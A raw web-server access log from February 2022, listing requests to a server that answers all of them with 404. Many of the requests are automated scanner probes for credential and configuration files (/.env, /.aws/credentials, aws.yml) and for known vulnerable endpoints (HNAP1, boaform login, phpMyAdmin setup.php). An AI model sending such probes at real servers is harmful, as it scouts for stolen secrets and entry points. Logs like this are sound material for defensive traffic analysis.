generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1169/1371] 162.142.125.219 () {34 vars in 444 bytes} [Mon Feb 14 13:43:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 93/1372] 107.189.10.196 () {28 vars in 311 bytes} [Mon Feb 14 13:50:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1170/1373] 107.189.10.196 () {40 vars in 673 bytes} [Mon Feb 14 13:50:49 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1171/1374] 103.135.38.34 () {32 vars in 464 bytes} [Mon Feb 14 14:15:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1172/1375] 36.94.190.37 () {32 vars in 462 bytes} [Mon Feb 14 16:14:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1173/1376] 83.97.20.34 () {30 vars in 328 bytes} [Mon Feb 14 16:56:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1174/1377] 142.147.99.155 () {36 vars in 524 bytes} [Mon Feb 14 17:08:50 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1175/1378] 142.147.99.155 () {40 vars in 631 bytes} [Mon Feb 14 17:08:51 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1176/1379] 142.147.99.155 () {36 vars in 524 bytes} [Mon Feb 14 17:16:15 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1177/1380] 142.147.99.155 () {40 vars in 631 bytes} [Mon Feb 14 17:16:19 2022] POST / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1178/1381] 107.189.10.196 () {28 vars in 311 bytes} [Mon Feb 14 17:29:21 2022] GET / => 
generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1179/1382] 107.189.10.196 () {40 vars in 673 bytes} [Mon Feb 14 17:29:22 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1180/1383] 83.143.86.62 () {34 vars in 436 bytes} [Mon Feb 14 17:33:29 2022] GET /cgi-bin/check_auth.cgi => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1181/1384] 83.143.86.62 () {34 vars in 408 bytes} [Mon Feb 14 17:33:30 2022] GET /wp-admin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1182/1385] 83.143.86.62 () {34 vars in 426 bytes} [Mon Feb 14 17:33:30 2022] GET /cgi-bin/login.cgi => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1183/1386] 83.143.86.62 () {34 vars in 424 bytes} [Mon Feb 14 17:33:32 2022] GET /cgi-bin/main.cgi => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1184/1387] 83.143.86.62 () {34 vars in 428 bytes} [Mon Feb 14 17:33:33 2022] GET /cgi-bin/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1185/1388] 20.188.111.10 () {36 vars in 427 bytes} [Mon Feb 14 17:56:09 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1186/1389] 183.136.225.56 () {34 vars in 456 bytes} [Mon Feb 14 18:22:07 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1187/1390] 13.229.89.192 () {42 vars in 791 bytes} [Mon Feb 14 18:43:13 2022] GET /_profiler/phpinfo => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers 
in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1188/1391] 13.229.89.192 () {42 vars in 779 bytes} [Mon Feb 14 18:43:14 2022] GET /phpinfo.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1189/1392] 13.229.89.192 () {42 vars in 771 bytes} [Mon Feb 14 18:43:14 2022] GET /phpinfo => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1190/1393] 13.229.89.192 () {42 vars in 771 bytes} [Mon Feb 14 18:43:14 2022] GET /aws.yml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1191/1394] 13.229.89.192 () {42 vars in 773 bytes} [Mon Feb 14 18:43:14 2022] GET /.env.bak => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1192/1395] 13.229.89.192 () {42 vars in 773 bytes} [Mon Feb 14 18:43:14 2022] GET /info.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1193/1396] 13.229.89.192 () {42 vars in 789 bytes} [Mon Feb 14 18:43:14 2022] GET /.aws/credentials => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1194/1397] 13.229.89.192 () {42 vars in 757 bytes} [Mon Feb 14 18:43:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1195/1398] 13.229.89.192 () {42 vars in 785 bytes} [Mon Feb 14 18:43:15 2022] GET /config/aws.yml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1196/1399] 13.229.89.192 () {46 vars in 871 bytes} [Mon Feb 14 18:43:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 19/1400] 13.229.89.192 () {42 
vars in 775 bytes} [Mon Feb 14 18:43:15 2022] GET /config.js => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1197/1401] 83.97.20.34 () {26 vars in 286 bytes} [Mon Feb 14 18:50:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1198/1402] 167.248.133.63 () {30 vars in 401 bytes} [Mon Feb 14 19:44:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1199/1403] 167.248.133.63 () {22 vars in 235 bytes} [Mon Feb 14 19:44:47 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1200/1404] 62.171.150.168 () {28 vars in 311 bytes} [Mon Feb 14 20:27:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1201/1405] 62.171.150.168 () {40 vars in 678 bytes} [Mon Feb 14 20:27:50 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1202/1406] 81.100.96.230 () {30 vars in 436 bytes} [Mon Feb 14 21:51:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1203/1407] 23.99.198.33 () {36 vars in 588 bytes} [Mon Feb 14 23:02:33 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 94/1408] 23.99.198.33 () {40 vars in 695 bytes} [Mon Feb 14 23:02:34 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 95/1409] 83.97.20.34 () {30 vars in 329 bytes} [Mon Feb 14 23:03:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 19148|app: 0|req: 1204/1410] 40.117.75.44 () {36 vars in 522 bytes} [Mon Feb 14 23:33:36 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1205/1411] 40.117.75.44 () {40 vars in 629 bytes} [Mon Feb 14 23:33:37 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1206/1412] 2.58.149.136 () {40 vars in 566 bytes} [Tue Feb 15 00:14:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1207/1413] 192.241.210.212 () {34 vars in 395 bytes} [Tue Feb 15 00:23:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1208/1414] 209.17.96.26 () {30 vars in 409 bytes} [Tue Feb 15 00:32:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1209/1415] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 15 01:01:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1210/1416] 109.237.96.50 () {28 vars in 310 bytes} [Tue Feb 15 01:03:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1211/1417] 162.142.125.221 () {30 vars in 402 bytes} [Tue Feb 15 01:28:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1212/1418] 162.142.125.221 () {22 vars in 235 bytes} [Tue Feb 15 01:28:33 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1213/1419] 106.15.202.168 () {34 vars in 460 bytes} [Tue Feb 15 01:39:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 
5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1214/1420] 128.14.134.170 () {34 vars in 488 bytes} [Tue Feb 15 02:22:09 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1215/1421] 185.180.143.8 () {30 vars in 446 bytes} [Tue Feb 15 03:03:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1216/1422] 185.180.143.8 () {30 vars in 470 bytes} [Tue Feb 15 03:03:37 2022] GET /showLogin.cc => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1217/1423] 20.55.53.144 () {34 vars in 549 bytes} [Tue Feb 15 03:31:00 2022] GET /k65LQW0vDRbNroh3IUYOgfzyxEg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1218/1424] 139.162.145.250 () {34 vars in 445 bytes} [Tue Feb 15 03:47:25 2022] GET /bag2 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1219/1425] 47.102.104.161 () {34 vars in 503 bytes} [Tue Feb 15 04:35:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1220/1426] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 15 04:53:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1221/1427] 162.142.125.210 () {30 vars in 402 bytes} [Tue Feb 15 05:03:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1222/1428] 162.142.125.210 () {22 vars in 235 bytes} [Tue Feb 15 05:03:32 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1223/1429] 104.206.128.6 () {30 vars in 372 
bytes} [Tue Feb 15 05:41:11 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1224/1430] 64.225.29.147 () {32 vars in 438 bytes} [Tue Feb 15 06:01:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1225/1431] 117.50.110.5 () {30 vars in 327 bytes} [Tue Feb 15 06:08:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1226/1432] 109.237.103.38 () {36 vars in 524 bytes} [Tue Feb 15 06:10:39 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1227/1433] 128.14.134.134 () {34 vars in 488 bytes} [Tue Feb 15 06:10:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1228/1434] 107.189.1.106 () {28 vars in 310 bytes} [Tue Feb 15 06:20:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1229/1435] 107.189.1.106 () {40 vars in 670 bytes} [Tue Feb 15 06:20:59 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1230/1436] 31.28.231.225 () {32 vars in 463 bytes} [Tue Feb 15 06:24:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1231/1437] 83.97.20.34 () {26 vars in 286 bytes} [Tue Feb 15 06:43:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1232/1438] 173.249.53.50 () {48 vars in 876 bytes} [Tue Feb 15 07:06:29 2022] POST /boaform/admin/formLogin => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on 
core 0) +[pid: 19148|app: 0|req: 1233/1439] 2.58.149.136 () {40 vars in 566 bytes} [Tue Feb 15 08:04:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1234/1440] 167.94.138.46 () {28 vars in 310 bytes} [Tue Feb 15 08:48:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1235/1441] 167.94.138.46 () {34 vars in 442 bytes} [Tue Feb 15 08:48:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1236/1442] 131.196.9.138 () {32 vars in 463 bytes} [Tue Feb 15 09:37:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1237/1443] 183.136.225.56 () {34 vars in 535 bytes} [Tue Feb 15 09:50:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1238/1444] 34.140.248.32 () {42 vars in 564 bytes} [Tue Feb 15 11:13:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1239/1445] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 15 11:16:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1240/1446] 5.35.38.12 () {32 vars in 461 bytes} [Tue Feb 15 11:30:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1241/1447] 64.62.197.152 () {28 vars in 307 bytes} [Tue Feb 15 12:16:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1242/1448] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 15 12:49:45 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1243/1449] 128.14.134.134 () {34 vars in 488 bytes} [Tue Feb 15 13:36:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1244/1450] 176.120.211.223 () {32 vars in 472 bytes} [Tue Feb 15 14:03:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1245/1451] 80.82.77.192 () {34 vars in 486 bytes} [Tue Feb 15 14:45:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1246/1452] 20.97.164.231 () {36 vars in 523 bytes} [Tue Feb 15 15:15:11 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1247/1453] 20.97.164.231 () {40 vars in 630 bytes} [Tue Feb 15 15:15:11 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1248/1454] 2.58.149.176 () {40 vars in 566 bytes} [Tue Feb 15 15:19:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1249/1455] 107.189.1.106 () {28 vars in 310 bytes} [Tue Feb 15 15:33:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1250/1456] 107.189.1.106 () {40 vars in 671 bytes} [Tue Feb 15 15:33:37 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1251/1457] 34.65.249.135 () {28 vars in 368 bytes} [Tue Feb 15 16:02:57 2022] GET /?scopeName=All&q=%unaggravated% => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1252/1458] 107.189.1.106 () {28 vars in 310 bytes} 
[Tue Feb 15 16:19:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1253/1459] 107.189.1.106 () {40 vars in 671 bytes} [Tue Feb 15 16:19:46 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1254/1460] 93.117.6.130 () {32 vars in 462 bytes} [Tue Feb 15 16:57:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1255/1461] 101.133.224.19 () {22 vars in 235 bytes} [Tue Feb 15 18:06:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1256/1462] 101.133.224.19 () {22 vars in 297 bytes} [Tue Feb 15 18:06:26 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1257/1463] 101.133.224.19 () {22 vars in 239 bytes} [Tue Feb 15 18:06:33 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1258/1464] 101.133.224.19 () {22 vars in 239 bytes} [Tue Feb 15 18:06:35 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1259/1465] 101.133.224.19 () {40 vars in 485 bytes} [Tue Feb 15 18:06:38 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1260/1466] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 15 18:51:34 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1261/1467] 109.237.103.9 () {36 vars in 523 bytes} [Tue Feb 15 18:53:56 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1262/1468] 45.95.169.105 () {28 vars in 310 bytes} [Tue Feb 15 21:05:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1263/1469] 45.95.169.105 () {40 vars in 670 bytes} [Tue Feb 15 21:05:32 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1264/1470] 2.58.149.176 () {40 vars in 566 bytes} [Tue Feb 15 21:35:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1265/1471] 45.163.135.104 () {32 vars in 465 bytes} [Tue Feb 15 21:35:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1266/1472] 89.248.165.201 () {36 vars in 533 bytes} [Tue Feb 15 21:36:21 2022] GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1267/1473] 89.248.165.201 () {36 vars in 507 bytes} [Tue Feb 15 21:36:22 2022] GET /phpMyAdmin-2.10.1.0/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1268/1474] 89.248.165.201 () {36 vars in 507 bytes} [Tue Feb 15 21:36:23 2022] GET /phpMyAdmin-2.10.2.0/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1269/1475] 89.248.165.201 () {36 vars in 507 bytes} [Tue Feb 15 21:36:24 2022] GET /phpMyAdmin-2.10.0.0/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1270/1476] 89.248.165.201 () {36 vars in 507 bytes} [Tue Feb 15 21:36:25 2022] GET /phpMyAdmin-2.10.0.1/scripts/setup.php => generated 179 
bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1271/1477] 89.248.165.201 () {36 vars in 505 bytes} [Tue Feb 15 21:36:26 2022] GET /phpMyAdmin-2.11.11/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1272/1478] 89.248.165.201 () {36 vars in 507 bytes} [Tue Feb 15 21:36:27 2022] GET /phpMyAdmin-2.11.11.3/scripts/setup.ph => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1273/1479] 89.248.165.201 () {36 vars in 509 bytes} [Tue Feb 15 21:36:28 2022] GET /phpMyAdmin-2.11.11.3/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1274/1480] 89.248.165.201 () {36 vars in 531 bytes} [Tue Feb 15 21:36:29 2022] GET /phpMyAdmin-2.11.1-all-languages/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1275/1481] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:36:30 2022] GET /phpMyAdmin-2/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1276/1482] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:36:32 2022] GET /phpMyadmin-2/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1277/1483] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:36:33 2022] GET /phpMyAdmin3/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1278/1484] 89.248.165.201 () {36 vars in 473 bytes} [Tue Feb 15 21:36:33 2022] GET /my/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 1279/1485] 89.248.165.201 () {36 vars in 483 bytes} [Tue Feb 15 21:36:35 2022] GET /MyAdmin/scripts/setup.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1280/1486] 89.248.165.201 () {36 vars in 489 bytes} [Tue Feb 15 21:36:36 2022] GET /PHPMYADMIN/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1281/1487] 89.248.165.201 () {36 vars in 473 bytes} [Tue Feb 15 21:36:37 2022] GET /db/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 46/1488] 89.248.165.201 () {36 vars in 483 bytes} [Tue Feb 15 21:36:38 2022] GET /dbadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 96/1489] 89.248.165.201 () {36 vars in 483 bytes} [Tue Feb 15 21:36:39 2022] GET /myadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 97/1490] 89.248.165.201 () {36 vars in 479 bytes} [Tue Feb 15 21:36:40 2022] GET /mysql/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 20/1491] 89.248.165.201 () {36 vars in 489 bytes} [Tue Feb 15 21:36:41 2022] GET /mysqladmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 